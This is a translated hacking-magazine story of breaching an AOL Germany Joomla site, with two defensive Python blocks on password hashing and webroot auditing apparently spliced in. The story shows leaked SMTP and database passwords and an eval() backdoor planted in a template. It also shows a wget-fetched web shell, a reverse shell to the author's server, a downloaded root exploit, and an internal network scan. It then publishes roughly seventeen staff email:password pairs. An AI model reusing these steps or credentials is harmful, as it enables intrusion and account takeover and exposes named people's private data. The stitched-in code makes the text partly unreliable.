
    AOL Corporation has always been something of a honeypot for every kind of
    hacker: millions of registered AIM, AOL Mail and ICQ users, hundreds of offices
    around the world, a billion-scale advertising market and plenty more that you
    can check directly on the aol.com home page, which sits in the Top 50 most
    visited websites on the whole internet.

    Looking at all this magnificence, you won't be surprised that one day I pointed
    my XSpider 7.7 at one of the AOL networks, the range 64.12.0.0 -
    64.12.255.255. So here is how things turned out...

    Victim detected

    Among the rich variety of corporate IP addresses in the specified range,
    alex-aolde-mtc02.evip.aol.com was the first to attract my attention. Closer
    inspection showed it to be a website, http://alex.aol.de, with a login and
    password home page of its own. A first glance made it clear that the site was
    running Joomla CMS 1.5.x.

    As you know, one of today's best tools for finding vulnerabilities in
    Joomla-based websites is the "Joomla! Security/Vulnerability Scanner" (joomscan),
    an OWASP project created by the guys from YGN Ethical Hacker Group. So, having
    downloaded the scanner, I launched it as follows:

    C:/Perl/bin/perl5.12.1.exe C:/joomscan/joomscan.pl -u http://alex.aol.de

    A few minutes later I got the following result:

    * Deduced version range is : [1.5.12 - 1.5.14]
    ...
    # 14
    Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
    Versions effected: 1.0.13 <=
    Check: /administrator/
    Exploit: It requires an administrator to be logged in and to be tricked into a
    specially crafted webpage.
    Vulnerable? Yes
    ...
    # 19
    Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
    Versions effected: Joomla! 1.5.12
    Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
    Exploit: While Joomla! team announced only File Upload vulnerability, in fact
    there are many. See: http://www.milw0rm.com/exploits/9296
    Vulnerable? Yes

    None of the "vulnerabilities" it found brought me any closer to the cherished
    goal of hacking the website.

    Help from OWASP

    Realizing that Joomla itself would not get me onto the server I needed, I
    decided to scan for the website's directories and files that are hidden from
    prying eyes, using another OWASP project, the DirBuster directory
    brute-forcing tool.

    After launching the program I set the following options:

    Target URL: http://alex.aol.de/;
    Work Method: Auto Switch (HEAD and GET);
    Number Of Threads: 200;
    Select starting options: Standard start point, Brute Force Dirs, Brute Force
    Files;
    File extension: php.

    Then I ran the brute-forcer with all the standard dictionaries it ships with.

    The results that pleased me most were ./info.php (phpinfo), ./pma
    (phpMyAdmin) and a ./dnld directory holding three really nice files
    (configuration.php, phpMyAdmin-3.3.2-english.tar, wirwarendrin.tar).

    The 80 MB wirwarendrin.tar archive made me happy, because the alex.aol.de
    home page links to wirwarendrin.de, which is a kind of mirror of the AOL
    resource.

    After downloading the file I found that it contained a full backup of our
    website :).

    Save your backups in a savings bank!

    While browsing the backup archive, what interested me most was the Joomla
    configuration file, configuration.php. It contained the following interesting
    things:

    <?php
    class JConfig {
    ...
    var $secret = 'NAAgXewXco6BSw2d';
    ...
    var $host = 'localhost';
    var $user = 'alex';
    var $db = 'test';
    ...
    var $smtpport = '465';
    var $smtpuser = 'wirwarendrin';
    var $smtppass = 'Briesben';
    var $smtphost = 'smtp.aol.com';
    ...
    var $password = 'wjedko,lg';
    ...
    }
    ?>

    The first thing I did was get into the wirwarendrin@aol.com mailbox which, as
    it turned out, was where the registration data of all alex.aol.de users was
    sent. Then it seemed logical to try the MySQL username and password against
    phpMyAdmin. Actually, I did that straight away :).

    Of course, the password for the "alex" user was correct, so I had two options
    for uploading a shell: add a new Joomla administrator, or brute-force the
    existing administrator's password. I chose the second.

    Quick and easy bruteforce!

    My favourite brute-forcing software is PasswordsPro, which handles many
    different hash types and supports the Joomla password hashing format,
    md5($pass.$salt).

    So, after downloading some rather large dictionaries and adding them to the
    PasswordsPro library, I settled in to wait patiently for the brute-forcer to
    crack the salted admin hash
    d86f4c81342b79c4bab8868656cabe46:t65HKT9iuoOUdvfIAD0JP0ynT6EpRHXb.
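The Joomla 1.5 storage scheme just described, md5($pass.$salt) kept as "hash:salt", shown from the defender's side as an added example that is not Joomla's or PasswordsPro's code: a verifier for the legacy format, a PBKDF2-HMAC-SHA256 replacement with a real work factor, and an audit helper that lists which accounts are still on the legacy format so they can be rehashed at their next login. Every record below is constructed, and the `pbkdf2_sha256$...` storage string is my own convention, not a Joomla format.

```python
"""Joomla 1.5 password records (md5($pass.$salt), stored as "hash:salt") beside a
slow salted KDF, plus an audit that lists accounts still on the legacy format.
Added example, not Joomla's or PasswordsPro's code; every record is constructed
and the pbkdf2_sha256$... storage format is my own convention."""
import hashlib
import hmac
import secrets
import string


def joomla15_hash(password: str, salt: str) -> str:
    """Legacy scheme: one MD5 over password+salt. The salt blocks precomputed
    tables, but MD5 is so fast that a wordlist still runs at millions of guesses
    per second per core, which is why an hours-long dictionary run succeeds."""
    digest = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return f"{digest}:{salt}"


def joomla15_verify(password: str, stored: str) -> bool:
    """Check a password against a 1.5-era record. A record without ':' is an
    unsalted MD5 carried over from Joomla 1.0; partition() then yields salt == ''."""
    digest, _, salt = stored.partition(":")
    expected = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return hmac.compare_digest(expected.encode(), digest.encode())


PBKDF2_ITERATIONS = 200_000  # work factor: each guess now costs this many HMAC calls


def pbkdf2_hash(password: str, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Hardened replacement: PBKDF2-HMAC-SHA256, random 16-byte salt, tunable cost."""
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _, iterations, salt_hex, dk_hex = parts
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex().encode(), dk_hex.encode())


def is_legacy_record(stored: str) -> bool:
    """True for the 32-hex-digit MD5 form, with or without ':salt'."""
    digest = stored.split(":", 1)[0]
    return len(digest) == 32 and all(c in string.hexdigits for c in digest)


def verify(password: str, stored: str) -> bool:
    """Dispatch on the stored format so old and new records coexist during migration."""
    if is_legacy_record(stored):
        return joomla15_verify(password, stored)
    return pbkdf2_verify(password, stored)


def legacy_accounts(records) -> list:
    """Usernames whose password still uses the legacy MD5 form: these should be
    rehashed with pbkdf2_hash() at their next successful login."""
    return sorted(user for user, stored in records if is_legacy_record(stored))


if __name__ == "__main__":
    # Constructed records: placeholder passwords, made-up salt.
    records = [("alice", joomla15_hash("correct horse battery", "Zx9Qm2Lp")),
               ("bob", pbkdf2_hash("staple dragon", 50_000))]
    print("accounts still on legacy MD5:", legacy_accounts(records))
    for user, stored in records:
        print(user, verify("correct horse battery", stored))
```

The verifier dispatches on the stored format, so an existing user table can be migrated one login at a time: check the legacy record, and on success overwrite it with a PBKDF2 record. The iteration count is the knob that separates the two schemes; PasswordsPro-style dictionary runs get slower in proportion to it.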

    After several hours of brute-forcing the utility gave me the password
    "qwertyzuaor" for that hash. I successfully logged into alex.aol.de, and into
    alex.aol.de/administrator as well.

    By the way, it turned out that the alex.aol.de website had been created by one
    of the AOL employees to coordinate staff parties at the German branch of AOL.
    About 450 former and current AOL employees were registered there to keep up
    with what was going on. So I started uploading a shell by modifying the Joomla
    template 🙂

    AOL Inside

    The template to edit was in the admin area under "Extensions -> Template
    Manager -> aol-exit -> Edit HTML". The template file itself lived at
    /data/servers/wahl-o-mat_aol_de/pages/alex_aol_de/templates/aol-exit/index.php.
    I inserted a small, cute construction at the top of the template file:

    <?php
    eval(stripslashes($_REQUEST[aaa]));
    ?>

    All that remained was to create a small HTML client for it:

    <form action="http://alex.aol.de/templates/aol-exit/index.php" method="POST">
    <input type="text" name="aaa"/>
    <input type="submit" value="Pwn It!"/>
    </form>

    The first thing I did was upload a WSO shell to the server with wget. I placed
    it directly in the templates directory and named it 404.php, so I could browse
    all the files and directories in comfort (by the way, another of the admin's
    sins was leaving absolutely every file and directory world-writable).

    Getting deeper!

    The /data/servers directory let me browse all of alex.aol.de's neighbour
    sites: editor.aol.fr, gat.aol.co.uk, sns.nexus.aol.com, wahl-o-mat.aol.de,
    matrix.aol.de. I didn't want to dig into their structure and purpose, so I
    simply downloaded all of those sites' sources to my VDS hard disk, after
    packing it all up with the following command:

    cd /data/servers;tar czvf /tmp/1.tgz ./*

    Another goal I set myself was root access on that server. The good news was
    that an old and dull kernel made that possible:

    Linux wahl-o-mat.aol.de 2.6.9-55.ELsmp #1 SMP Fri Apr 20 17:03:35 EDT 2007 i686

    I needed an interactive shell to start with. I got it with a banal Perl
    back-connect from the WSO Network section to port 31337 of my VDS, where
    netcat was listening:

    c:/netcat/nc.exe -l -p 31337

    With that in place I searched http://www.exploit-db.com for a matching root
    exploit. The one I found was, again, something with a German flavour:
    "wunderbar emporium". After a straightforward sequence of commands I got the
    coveted "uid = 0 (root) gid = 0 (root) groups = 11560 (httpd)":

    wget http://www.grsecurity.net/~spender/wunderbar_emporium.tgz;tar xzfv
    wunderbar_emporium.tgz;chmod 0777 ./*;./wunderbar_emporium.sh

    Interesting

    Having obtained root, I wanted, for some reason, to scan the internal network.
    I ran ifconfig and found that the server had the address 10.62.134.80 on the
    internal network. So the next thing I did was download and install nmap with
    rpm:

    rpm -vhU http://nmap.org/dist/nmap-5.21-1.i386.rpm

    and run it as follows:

    nmap -v -n -sS 10.62.134.0/24

    I'm not going to describe everything else I did on the German AOL network, but
    I will show a couple of the more interesting scanner reports:

    Nmap scan report for 10.62.134.89
    Host is up (0.00013s latency).
    Not shown: 986 closed ports
    PORT STATE SERVICE
    22/tcp open ssh
    80/tcp open http
    135/tcp open msrpc
    445/tcp open microsoft-ds
    1024/tcp open kdm
    1041/tcp open unknown
    1051/tcp open optima-vnet
    1311/tcp open rxmon
    1801/tcp open unknown
    2099/tcp open unknown
    2103/tcp open zephyr-clt
    2105/tcp open eklogin
    2107/tcp open unknown
    3389/tcp open ms-term-serv
    MAC Address: 00:18:8B:74:52:6E (Dell)
    ...

    Nmap scan report for 10.62.134.96
    Host is up (0.00013s latency).
    Not shown: 971 closed ports
    PORT STATE SERVICE
    22/tcp open ssh
    88/tcp open kerberos-sec
    135/tcp open msrpc
    139/tcp open netbios-ssn
    389/tcp open ldap
    445/tcp open microsoft-ds
    464/tcp open kpasswd5
    593/tcp open http-rpc-epmap
    636/tcp open ldapssl
    1024/tcp open kdm
    1025/tcp open NFS-or-IIS
    1027/tcp open IIS
    1078/tcp open unknown
    1112/tcp open msql
    1311/tcp open rxmon
    1801/tcp open unknown
    2099/tcp open unknown
    2103/tcp open zephyr-clt
    2105/tcp open eklogin
    2107/tcp open unknown
    3268/tcp open globalcatLDAP
    3269/tcp open globalcatLDAPssl
    3389/tcp open ms-term-serv
    9998/tcp open unknown
    13722/tcp open netbackup
    13782/tcp open netbackup
    13783/tcp open netbackup
    49152/tcp open unknown
    49153/tcp open unknown
    MAC Address: 00:13:72:5A:3E:78 (Dell)

    As you can see, AOL is fond of Microsoft products :).

    AOL Confidential

    That's it for today about the troubled AOL internal network; let me move on to
    the usernames and password hashes of corporate employees that I pulled from
    the Joomla CMS database. As I wrote above, PasswordsPro had really helped me
    crack the alex.aol.de administrator password hash. Nevertheless, I decided not
    to stop at the admin password alone and started brute-forcing the remaining
    450 accounts. I successfully cracked 197 of them. Then I quietly started
    checking whether those passwords also matched the AOL staff's email passwords.
    Here are some interesting live accounts:

    guenterstaar guenterstaar@aol.com:keiness
    thomaskuck thomaskuck@aol.com:sascha
    mdfreedom99 marcdrewello@aol.com:Magic23
    ClaudiaLangwald ClaudiaLangwald@aol.com:Silvera
    bettyvonloesch bettyvonloesch@aol.com:hanne
    Pierre PierreBeneHH@aol.com:wombast
    Tenge Tenge@aol.com:derwis
    JennySefkow JennySefkow@aol.com:varita
    NinaRixenHH@aol.com NinaRixenHH@aol.com:brauere
    Jennifer2706 jennifermatheja@aol.com:elite15
    A.V.aus H. voigthh@googlemail.com:Delphines
    fkorupp frederickorupp@googlemail.com:wasistdas
    KrassowskiSabine@aol.de KrassowskiSabine@aol.de:Sommer44
    neddie annettharksenhh@aol.de:hochzeis
    Trixi seebertrixi@aol.de:sommer07
    tringasvassiliki tringasvassiliki@aol.de:perikle
    AgnesAB
    agnesboltzenhh@aol.de:April2008

    As you can see, the simplicity of the passwords is mind-blowing :).

    I found a lot of genuinely entertaining documents in those mailboxes: internal
    AOL receipts, employee summaries, photographs of offices, various addresses and
    phone numbers, some eBay and PayPal passwords (!), some statistics, and so on.

    Here is just a part of one internal document marked "Company Confidential".

    AOL Germany SNAPSHOT SUMMARY as of COB
    Date : [2006-02-11]
    Business :
    AOL
    GERMANY (AOL)
    FOR [2006-02-11]
    -Ending Members 2,687,173
    -Registrations 1,824
    -Reactivations 146
    -Overhead Conversions 1
    -Cancellations 1,472
    -Terminations 549
    -Net Change -50
    -Customer Hours 7,301,418
    -Total Hours 7,322,081

    Apparently these statistics give full information on the user turnover of the
    German branch of AOL as of 11/02/2006 :).

    Last thing

    You have just watched another large-company website hack story unfold. It
    happened because of the banal carelessness and inattention of the website
    administrator. I can name a few fundamental factors: a publicly accessible
    backup, phpMyAdmin reachable by external users, an old kernel, world-writable
    files and directories, and some really predictable passwords. I hope that after
    reading this opus you will never repeat the really stupid mistakes the AOL
    staff made :).

    INFO:

    To keep your website's internal directories away from prying eyes, I advise
    putting an .htaccess file with a single line into every sensitive directory
    (note the minus sign: "+Indexes" would switch directory listing on, the exact
    opposite of what you want):

    Options -Indexes

    To deny all outside access to the files in a directory, add two more lines to
    the .htaccess file (this is the Apache 2.2 access-control syntax, written
    without a space after the comma; Apache 2.4 only honours it with
    mod_access_compat loaded and otherwise expects the Require directive):

    Order Deny,Allow
    Deny from all
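The checks an administrator would want for the factors named in the closing sections (a backup and a configuration.php copy inside the document root, phpinfo and phpMyAdmin reachable from outside, world-writable files, and sensitive directories without a denying .htaccess), as an added example that is not the article's own tooling or Joomla's code. It audits a local webroot and writes a hardening .htaccess that carries both the Apache 2.2 Order/Deny lines from the article and the 2.4 Require form; the demo tree it builds, and every file name in it, is constructed.

```python
"""Audit a Joomla webroot for the mistakes from the write-up: backups and config
copies inside the document root, phpinfo() pages, a reachable phpMyAdmin
directory, world-writable paths, and sensitive directories with no denying
.htaccess. Added example (not Joomla's or the article's code); the tree built
by build_demo_tree() is constructed."""
import os
import stat
import tempfile

ARCHIVE_SUFFIXES = (".tar", ".tgz", ".tar.gz", ".zip", ".sql", ".bak")
PMA_DIR_NAMES = {"pma", "phpmyadmin", "myadmin"}

# Apache 2.2 syntax (Order/Deny) and 2.4 syntax (Require) side by side so the
# file works on either version; -Indexes switches directory listings off.
HTACCESS_DENY = """\
Options -Indexes
<IfModule mod_authz_core.c>
    Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
    Order Deny,Allow
    Deny from all
</IfModule>
"""


def _rel(root, path):
    return os.path.relpath(path, root).replace(os.sep, "/")


def find_exposed_artifacts(root):
    """(relative path, reason) for everything that must not be fetchable over HTTP."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if d.lower() in PMA_DIR_NAMES:
                findings.append((_rel(root, os.path.join(dirpath, d)) + "/",
                                 "phpMyAdmin reachable from the internet"))
        for f in filenames:
            full, low = os.path.join(dirpath, f), f.lower()
            if low.endswith(ARCHIVE_SUFFIXES):
                findings.append((_rel(root, full), "archive/backup inside docroot"))
            elif low == "configuration.php" and os.path.abspath(dirpath) != os.path.abspath(root):
                findings.append((_rel(root, full), "copy of configuration.php outside install root"))
            elif low.endswith(".php"):
                with open(full, "rb") as fh:
                    if b"phpinfo(" in fh.read(65536):
                        findings.append((_rel(root, full), "phpinfo() page"))
    return sorted(findings)


def find_world_writable(root):
    """Paths whose mode grants write to 'other' (the write-up's open-for-writing sin)."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            mode = os.lstat(full).st_mode
            if not stat.S_ISLNK(mode) and mode & stat.S_IWOTH:
                hits.append(_rel(root, full))
    return sorted(hits)


def sensitive_dirs(root):
    """Directories holding a finding; the document root itself is never locked down."""
    dirs = set()
    for rel, reason in find_exposed_artifacts(root):
        d = rel.rstrip("/") if reason.startswith("phpMyAdmin") else os.path.dirname(rel)
        if d:
            dirs.add(d)
    return sorted(dirs)


def unhardened_sensitive_dirs(root):
    """Sensitive directories whose .htaccess is missing or lacks listing-off plus deny-all."""
    missing = []
    for d in sensitive_dirs(root):
        ht = os.path.join(root, d, ".htaccess")
        text = open(ht, encoding="utf-8").read() if os.path.isfile(ht) else ""
        if "Options -Indexes" not in text or not ("Require all denied" in text or "Deny from all" in text):
            missing.append(d)
    return missing


def harden_all(root):
    """Write HTACCESS_DENY into every sensitive directory; returns the directories touched."""
    done = []
    for d in sensitive_dirs(root):
        with open(os.path.join(root, d, ".htaccess"), "w", encoding="utf-8") as fh:
            fh.write(HTACCESS_DENY)
        done.append(d)
    return done


def build_demo_tree():
    """Constructed webroot mirroring the article's layout; all names are made up."""
    root = tempfile.mkdtemp(prefix="webroot-")

    def put(rel, data):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)
        return full

    put("index.php", b"<?php echo 'hi'; ?>")
    put("configuration.php", b"<?php class JConfig {} ?>")  # legitimate, at install root
    put("info.php", b"<?php phpinfo(); ?>")
    put("dnld/site-backup.tar", b"\0" * 512)
    put("dnld/configuration.php", b"<?php class JConfig { var $password = 'x'; } ?>")
    put("pma/config.inc.php", b"<?php $cfg = []; ?>")
    tpl = put("templates/default/index.php", b"<?php ?>")
    os.chmod(tpl, 0o666)                   # world-writable file ...
    os.chmod(os.path.dirname(tpl), 0o777)  # ... inside a world-writable directory
    return root


if __name__ == "__main__":
    root = build_demo_tree()
    for rel, reason in find_exposed_artifacts(root):
        print(f"EXPOSED  {rel}: {reason}")
    for rel in find_world_writable(root):
        print(f"WRITABLE {rel}")
    print("hardened:", harden_all(root), "still open:", unhardened_sensitive_dirs(root))
```

Run it against a real document root by replacing build_demo_tree() with the path. The .htaccess only helps where AllowOverride permits it and only for Apache; the sturdier fix for the archive and configuration.php copy is to move them out of the document root altogether, and phpMyAdmin is better removed or limited to trusted addresses than left behind a deny-all.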

     

    DANGER

    The above article is the product of the author's diseased imagination. Any
    overlap with an existing site is accidental. Neither the editors nor the author
    shall be liable for any possible damages caused by the materials of this
    article.
